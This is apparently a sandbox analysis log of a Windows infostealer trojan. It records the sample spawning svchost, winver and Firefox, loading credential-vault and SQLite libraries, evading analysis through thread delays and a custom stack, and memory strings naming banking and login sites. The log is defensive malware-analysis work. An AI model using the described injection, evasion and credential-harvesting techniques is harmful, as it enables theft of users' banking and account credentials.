                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00538900 appears 42 times
                Source: z6tNjJC614.exe, 00000000.00000003.1299556459.0000000003A0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z6tNjJC614.exe
                Source: z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003863000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z6tNjJC614.exe
                Source: z6tNjJC614.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057A06A GetLastError,FormatMessageW,0_2_0057A06A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005681CB AdjustTokenPrivileges,CloseHandle,0_2_005681CB
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005687E1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0057B333
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0058EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0058EE0D
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0057C397
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00514E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00514E89
                Source: C:\Users\user\Desktop\z6tNjJC614.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut37ED.tmpJump to behavior
                Source: z6tNjJC614.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 0000000C.00000003.1871694641.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1877684652.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1871694641.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.0000000000819000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.00000000007C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: z6tNjJC614.exeReversingLabs: Detection: 83%
                Source: z6tNjJC614.exeVirustotal: Detection: 66%
                Source: unknownProcess created: C:\Users\user\Desktop\z6tNjJC614.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"Jump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: z6tNjJC614.exeStatic file information: File size 1225216 > 1048576
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: z6tNjJC614.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tFEgkRNveR.exe, 0000000B.00000002.3124395582.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: z6tNjJC614.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: z6tNjJC614.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: z6tNjJC614.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: z6tNjJC614.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: z6tNjJC614.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00514B37 LoadLibraryA,GetProcAddress,0_2_00514B37
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0051C4C6 push A30051BAh; retn 0051h0_2_0051C50D
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00538945 push ecx; ret 0_2_00538958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00411948 push ss; retf 8_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040214C pushad ; retf 8_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416AAC push esp; retf 8_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00413B33 pushfd ; ret 8_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004033E0 push eax; ret 8_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004144FC push edi; retf 8_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00415D23 push 00000009h; retn 3081h8_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00408695 push edx; retf 8_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004086AF push edx; retf 8_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390225F pushad ; ret 8_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039027FA pushad ; ret 8_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039309AD push ecx; mov dword ptr [esp], ecx8_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390283D push eax; iretd 8_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03901368 push eax; iretd 8_2_03901369
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_052074D0 push esp; retf 11_2_052074D1
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0521003E push eax; iretd 11_2_0521003F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_05210063 push esp; retf 11_2_0521006C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051F90B9 push edx; retf 11_2_051F90D2
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051F90D3 push edx; retf 11_2_051F90D2
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0520236C push ss; retf 11_2_05202372
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_05206A1C push eax; retf 11_2_05206A1D
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08704899 push ebp; ret 11_2_087048AA
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0870710E push eax; retf 11_2_0870710F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08702A5E push ss; retf 11_2_08702A64
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08707BC2 push esp; retf 11_2_08707BC3
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08704C49 pushfd ; ret 11_2_08704C8F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FB4BF push ebx; iretd 11_2_086FB4C0
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FAED9 push esp; ret 11_2_086FAEDC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FB77E push cs; ret 11_2_086FB784
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005148D7
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00595376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00595376
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00533187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00533187
                Source: C:\Users\user\Desktop\z6tNjJC614.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z6tNjJC614.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\z6tNjJC614.exeAPI/Special instruction interceptor: Address: 10371DC
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E rdtsc 8_2_0397096E
                Source: C:\Users\user\Desktop\z6tNjJC614.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.6 %
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe TID: 7684Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe TID: 7684Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7664Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7664Thread sleep time: -78000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057445A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057C6D1 FindFirstFileW,FindClose,0_2_0057C6D1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0057C75C
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0057EF95
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0057F0F2
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0057F3F3
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005737EF
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00573B12
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0057BCBC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004AC740 FindFirstFileW,FindNextFileW,FindClose,12_2_004AC740
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005149A0
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696492231]
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 341G64J42.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 341G64J42.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169649=FE
                Source: 341G64J42.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2
                Source: 341G64J42.12.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696492231j
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696492231h
                Source: 341G64J42.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 341G64J42.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 341G64J42.12.drBinary or memory string: discord.comVMware20,11696492231f
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000775000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.1985824719.000002800068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231~
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware
                Source: 341G64J42.12.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 341G64J42.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 341G64J42.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231t
